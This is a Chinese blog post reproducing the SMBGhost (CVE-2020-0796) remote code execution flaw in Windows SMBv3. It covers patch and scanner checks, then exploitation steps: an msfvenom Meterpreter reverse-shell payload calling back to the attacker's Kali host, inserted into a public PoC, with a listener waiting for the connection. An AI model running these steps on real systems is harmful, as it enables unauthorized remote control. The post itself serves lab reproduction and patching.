永恒之黑(CVE-2020-0796)漏洞复现

永恒之黑漏洞复现

CVE-2020-0796利用的PoC代码,极大的增加了该漏洞的潜在危害。攻击者可以精心构造数据包发送到SMB V3服务器,无需经过身份验证,即可在目标服务器上执行任意代码。攻击者可以通过部署一台恶意SMB V3服务器,并诱导用户连接到该服务器,一旦用户连接,即可在计算机上执行攻击者定义的恶意代码

影响范围
永恒之黑(CVE-2020-0796)漏洞复现_第1张图片

检测方式

1.自行检测
在windows中运行cmd 输入
systeminfo | findstr KB4551762(KB为微软漏洞)
永恒之黑(CVE-2020-0796)漏洞复现_第2张图片
如上图所示,则该系统存在该漏洞
2.python脚本检测
脚本下载:https://github.com/ollypwn/SMBGhos
将脚本安装到kali中,利用python进行检测,命令如下
@kali:~/tools/smbGhost/SMBGhost$ python3 scanner.py 目标IP
如果有漏洞就会显示Vulnerable

漏洞复现
思路:本漏洞是远程代码执行,执行payload使用meterpreter模块
工具下载:https://github.com/chompie1337/SMBGhost_RCE_PoC.git
1.生成二进制shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali IP lport=端口 -b “\x00” -f python
永恒之黑(CVE-2020-0796)漏洞复现_第3张图片2.将生成的shellcode替换掉原文件的USER_PAYLOAD
永恒之黑(CVE-2020-0796)漏洞复现_第4张图片
3.运行handler进行监听
永恒之黑(CVE-2020-0796)漏洞复现_第5张图片
永恒之黑(CVE-2020-0796)漏洞复现_第6张图片
4.执行我们修改后的文件,关闭windows10的防火墙
永恒之黑(CVE-2020-0796)漏洞复现_第7张图片
5.在handler中进行连接永恒之黑(CVE-2020-0796)漏洞复现_第8张图片
友情提示:此漏洞成功率极低,翻车率很高,建议多次尝试,博主复现了一天就成功了一次,很烦。
解决方法:打补丁,对系统进行升级
如果本片文章对您有帮助,请点一波赞支持一下,嘻嘻。

再次提示:网络不是法外之地,请勿参与违法活动!

你可能感兴趣的:(漏洞复现,系统漏洞,cve,安全漏洞,kali)